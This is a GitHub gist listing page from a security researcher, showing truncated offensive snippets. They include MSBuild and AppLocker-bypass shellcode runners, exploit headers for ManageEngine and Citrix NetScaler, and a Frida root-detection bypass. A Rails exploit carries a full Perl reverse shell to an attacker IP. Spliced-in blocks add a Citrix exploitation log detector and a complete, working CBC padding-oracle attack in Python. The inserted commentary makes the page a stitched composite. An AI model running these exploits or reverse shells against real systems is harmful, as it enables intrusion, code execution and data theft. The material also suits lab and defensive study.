
LongCat pich4ya

@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix a Python virtualenv after a Python update
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - buy a new one :)
Connect the Pixel 3a to the MBP and allow USB debugging access in the device's prompt.
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
pich4ya / src-2020-0011.py
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
pich4ya / readme_render_exploit.py
Last active Feb 8, 2020
Fix the broken rails_dynamic_render_code_exec exploit against Metasploitable 3
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3: RCE through render params[:os]
# msf multi/http/rails_dynamic_render_code_exec does not work there because ImageMagick is not installed
# This exploit only changes the temporary file's extension to an empty string
import requests
# 1. tmp upload
host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
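The newbm.pl endpoint in that snippet is reached through the Citrix ADC directory traversal (CVE-2019-19781): /vpn/ is unauthenticated and the path is not normalised, so /vpn/../vpns/ lands on the Perl scripts behind it, newbm.pl writes an attacker-named .xml template under /vpns/portal/, and rendering that template runs the embedded code. The detector below is an added example (not 0x09AL's or the gist's code) that runs over constructed access-log lines and classifies each traversal by stage, then decides per source IP whether it saw a scan or a completed chain. The CLF-style log layout and the stage names are this example's assumptions.

```python
import re
from urllib.parse import unquote

# Constructed CLF-style lines; the only assumption is that the request line
# is quoted as "METHOD PATH PROTO" followed by the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# /vpn/ is reachable unauthenticated and ".." is not normalised, so
# /vpn/../vpns/ reaches the scripts that should need a session.
TRAVERSAL_RE = re.compile(r"/vpn/(?:\.\./)+vpns/")


def classify(raw_path):
    """Map a request path to an exploit stage, or None if it is not a
    /vpn/../vpns/ traversal at all."""
    path = unquote(unquote(raw_path)).split("?", 1)[0]   # undo %2e%2e and double encoding
    path = path.replace("\\", "/").lower()
    if not TRAVERSAL_RE.search(path):
        return None
    if path.endswith("/vpns/portal/scripts/newbm.pl"):
        return "write-template"     # newbm.pl writes an attacker-named .xml under /vpns/portal/
    if "/vpns/portal/" in path and path.endswith(".xml"):
        return "render-template"    # rendering that template evaluates the embedded Perl
    if path.endswith("/vpns/cfg/smb.conf"):
        return "recon"              # the unauthenticated file read mass scanners use
    return "traversal"


def scan(lines):
    """Return (ip, method, stage, status) for every line that is a traversal."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        stage = classify(m["path"])
        if stage is not None:
            alerts.append((m["ip"], m["method"], stage, int(m["status"])))
    return alerts


def verdict_per_ip(alerts):
    """'exploit' when one source both wrote and rendered a template, else 'scan'."""
    stages = {}
    for ip, _method, stage, _status in alerts:
        stages.setdefault(ip, set()).add(stage)
    return {ip: ("exploit" if {"write-template", "render-template"} <= s else "scan")
            for ip, s in stages.items()}


# Constructed sample log: one full chain, one benign user, one bare scanner.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2020:10:01:02 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83',
    '203.0.113.7 - - [19/Jan/2020:10:01:05 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 31',
    '203.0.113.7 - - [19/Jan/2020:10:01:09 +0000] "GET /vpn/%2e%2e/vpns/portal/abc123.xml HTTP/1.1" 200 0',
    '198.51.100.2 - - [19/Jan/2020:10:02:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 1034',
    '198.51.100.2 - - [19/Jan/2020:10:02:03 +0000] "GET /vpns/portal/scripts/rmbm.pl HTTP/1.1" 403 12',
    '192.0.2.9 - - [19/Jan/2020:10:03:00 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
    print(verdict_per_ip(scan(SAMPLE_LOG)))
```

A direct /vpns/ request without the /vpn/../ prefix is deliberately not alerted on: that path is behind authentication, and flagging it would drown the real signal in ordinary portal traffic.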
pich4ya / secureRootCert1.java
Last active Nov 29, 2019
How to connect to an internal API whose server certificate is issued by an internal root CA without trusting all HTTPS certs
/*
Prerequisites
- Make sure you already have the root certificate file
- Set $JAVA_HOME correctly and make sure the file $JAVA_HOME/jre/lib/security/cacerts exists
- The Java keystore password is "changeit" by default
Steps
1. Download or obtain the root certificate you are going to use first
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (killed itself) if Magisk was installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check the console logs, the RootBeer source, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
pich4ya / padbuster_macos2019.txt
Created Aug 5, 2019
Install PadBuster on macOS Mojave 10.14.5
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster
perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"
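Setting aside the -bruteforce and -encoding 3 (ASP.NET UrlToken) options, what that last command runs is the CBC padding oracle attack. The block below is an added Python re-implementation of that attack, not padbuster's code, run against a constructed oracle so it works offline: the block cipher is a toy keyed substitution (not secure, only invertible), but the CBC chaining, PKCS#7 check and the right-to-left byte recovery loop are exactly what padbuster performs against a real ScriptResource.axd endpoint with block size 16. KEY, IV and SECRET are constructed samples.

```python
import hashlib
import random

BS = 16  # block size in bytes, the "16" given to padbuster above


def _toy_cipher(key):
    """Constructed toy block cipher: keyed byte substitution over an XOR mask.
    Not secure; it only has to be invertible so that CBC and PKCS#7 behave
    exactly as they would with AES for the purposes of the attack."""
    mask = hashlib.sha256(key).digest()[:BS]
    sbox = list(range(256))
    random.Random(int.from_bytes(key, "big")).shuffle(sbox)
    inv = [0] * 256
    for i, v in enumerate(sbox):
        inv[v] = i
    enc = lambda blk: bytes(sbox[b ^ m] for b, m in zip(blk, mask))
    dec = lambda blk: bytes(inv[c] ^ m for c, m in zip(blk, mask))
    return enc, dec


def pad(data):
    n = BS - len(data) % BS
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BS or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, padded):
    enc = _toy_cipher(key)[0]
    out, prev = b"", iv
    for i in range(0, len(padded), BS):
        prev = enc(bytes(a ^ b for a, b in zip(padded[i:i + BS], prev)))
        out += prev
    return iv + out   # IV travels in the clear, as it does in the ScriptResource.axd case


def cbc_decrypt(key, ciphertext):
    dec = _toy_cipher(key)[1]
    out = b""
    for i in range(BS, len(ciphertext), BS):
        out += bytes(a ^ b for a, b in zip(dec(ciphertext[i:i + BS]), ciphertext[i - BS:i]))
    return out


def make_oracle(key):
    """Server side: leaks only whether the padding was valid (e.g. 500 vs 200)."""
    def oracle(ciphertext):
        try:
            unpad(cbc_decrypt(key, ciphertext))
            return True
        except ValueError:
            return False
    return oracle


def padding_oracle_decrypt(ciphertext, oracle):
    """Recover the plaintext from yes/no answers alone, at most 256 queries
    per byte. This is the loop padbuster runs against the real target."""
    blocks = [ciphertext[i:i + BS] for i in range(0, len(ciphertext), BS)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BS)          # D_k(target), learned right to left
        for pos in range(BS - 1, -1, -1):
            padval = BS - pos
            forged = bytearray(BS)
            for j in range(pos + 1, BS):
                forged[j] = inter[j] ^ padval   # known tail must decrypt to padval
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BS - 1:
                    # a 0x02 0x02 (or longer) pad also validates; flipping the byte
                    # to the left only survives if the real pad was a lone 0x01
                    forged[pos - 1] ^= 0xFF
                    still_valid = oracle(bytes(forged) + target)
                    forged[pos - 1] ^= 0xFF
                    if not still_valid:
                        continue
                inter[pos] = guess ^ padval
                break
            else:
                raise RuntimeError("oracle never accepted byte %d" % pos)
        recovered += bytes(a ^ b for a, b in zip(inter, prev))
    return recovered


KEY = b"constructed demo key, never leaves the server"
IV = bytes(range(BS))
SECRET = b"user=guest;role=admin;flag=1"   # constructed sample plaintext


def demo():
    """Encrypt SECRET, then recover it through the oracle without KEY."""
    ct = cbc_encrypt(KEY, IV, pad(SECRET))
    return unpad(padding_oracle_decrypt(ct, make_oracle(KEY)))


if __name__ == "__main__":
    print(demo())
```

The same loop decrypts any CBC ciphertext the oracle will answer for, which is why a padding error that differs from a MAC or decryption error is enough on its own; the fix is to authenticate the ciphertext (encrypt-then-MAC or an AEAD mode) and return one indistinguishable error for every failure.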